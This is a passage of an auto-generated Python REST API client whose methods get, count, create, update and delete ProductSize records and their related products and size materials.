:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_products_fk_get_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_products_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_get(self, id, **kwargs):
"""
Queries products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[Product]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_products_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_get_with_http_info(self, id, **kwargs):
"""
Queries products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[Product]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Product]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_post(self, id, **kwargs):
"""
Creates a new instance in products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_post_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_products_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_put(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_put(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_put_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_put_with_http_info(id, **kwargs)
return data
def product_sizes_id_put_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_put_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_replace_post(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_replace_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_replace_post_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_replace_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_replace_post_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_replace_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_replace_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_replace_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/replace'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_count_get(self, id, **kwargs):
"""
Counts sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_count_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_count_get_with_http_info(self, id, **kwargs):
"""
Counts sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_get(self, id, **kwargs):
"""
Queries sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductSizeMaterial]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_get_with_http_info(self, id, **kwargs):
"""
Queries sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductSizeMaterial]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
